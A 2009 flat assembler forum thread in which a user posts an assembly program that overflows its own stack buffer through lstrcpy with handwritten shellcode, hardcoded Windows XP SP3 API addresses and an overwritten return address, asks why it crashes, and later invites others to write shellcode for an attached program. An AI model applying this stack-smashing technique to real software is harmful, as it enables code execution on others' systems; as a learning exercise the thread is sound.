flat assembler
Message board for the users of flat assembler.

Index > Windows > Stack overflow

Author
Thread Post new topic Reply to topic
eskizo



Joined: 22 Nov 2005
Posts: 59
eskizo 21 Jul 2009, 19:58
Hi,

When I was trying to understand the complexity of the stack operations I found a discussion on "stack overflow". I became very curious and tried to make my own stack overflow, using a little "shellcode" made by my self:

Code:
; buffer overflow test

format PE GUI 4.0
include '%fasminc%\win32a.inc'

section '.code' readable executable

entry $

  push 0
      push title
  push caption
        push 0
      call [MessageBox]

       call FillBuffer

 push 0
      push title
  push caption
        push 0
      call [MessageBox]

       push 0
      call [ExitProcess]

      proc FillBuffer

         push ebp
            mov ebp, esp
                sub esp, 72
         push shellcode
              push esp
            call [lstrcpy]
              leave
               ret
 endp

    title db 'BOF test', 0
    caption db 'Testing stack overflow', 0

    shellcode:
  nop
 nop
 nop
 nop
 xor eax, eax
        push eax
    push eax
    push eax
    push eax
    mov eax, 7E3A07EAh ;MessageBox (WinXP sp3)
  call eax
;ERROR HERE
     mov eax, 7C81CB12h ;ExitProcess (WinXP sp3)
 call eax

        db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA', 70h, 0FFh, 06h, 00h ;0006FFA4

section '.idata' readable import

        library kernel32, 'KERNEL32.DLL', user32, 'USER32.DLL'
  import user32, MessageBox, 'MessageBoxA'
  import kernel32, lstrcpy, 'lstrcpy', ExitProcess, 'ExitProcess'    


The problem is:

Debugging this program on OllyDbg, the program crashes when returning from call eax (MessageBox WinXP sp3). Please help me to understand why it crashes. Maybe MessageBox function destroys the "shellcode" but I didn't see that.

Thankyou.
Post 21 Jul 2009, 19:58
View user's profile Send private message Reply with quote
asmcoder



Joined: 02 Jun 2008
Posts: 784
asmcoder 21 Jul 2009, 22:20
[content deleted]


Last edited by asmcoder on 14 Aug 2009, 14:48; edited 1 time in total
Post 21 Jul 2009, 22:20
View user's profile Send private message Reply with quote
eskizo



Joined: 22 Nov 2005
Posts: 59
eskizo 22 Jul 2009, 11:51
asmcoder,

Thanks for the answer, but your code is not self explanable. I believe it works, but I can't understand why my one didn't work. Actually, your code just "jumps" to a predetermined code inside the program, I mean, your shellcode is not a real one (How would you inject a shellcode in a program you don't have the binarie?). I used the (l)strcpy function, becouse it is the main "stack overflow" responsible in vulnerable programs (unix and win32).
Post 22 Jul 2009, 11:51
View user's profile Send private message Reply with quote
asmcoder



Joined: 02 Jun 2008
Posts: 784
asmcoder 22 Jul 2009, 20:23
[content deleted]


Last edited by asmcoder on 14 Aug 2009, 14:48; edited 1 time in total
Post 22 Jul 2009, 20:23
View user's profile Send private message Reply with quote
eskizo



Joined: 22 Nov 2005
Posts: 59
eskizo 23 Jul 2009, 00:06
asmcoder: Here we go. If you can, add some comments!


Description: This program just read a certain file and show its content in a MessageBox.
Download
Filename: Shellme.rar
Filesize: 2.47 KB
Downloaded: 243 Time(s)

Post 23 Jul 2009, 00:06
View user's profile Send private message Reply with quote
eskizo



Joined: 22 Nov 2005
Posts: 59
eskizo 01 Aug 2009, 15:03
Can anyone do that?
Post 01 Aug 2009, 15:03
View user's profile Send private message Reply with quote
Display posts from previous:
Post new topic Reply to topic

Jump to:  


< Last Thread | Next Thread >
Forum Rules:
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You cannot attach files in this forum
You can download files in this forum


Copyright © 1999-2025, Tomasz Grysztar. Also on GitHub, YouTube.

Website powered by rwasa.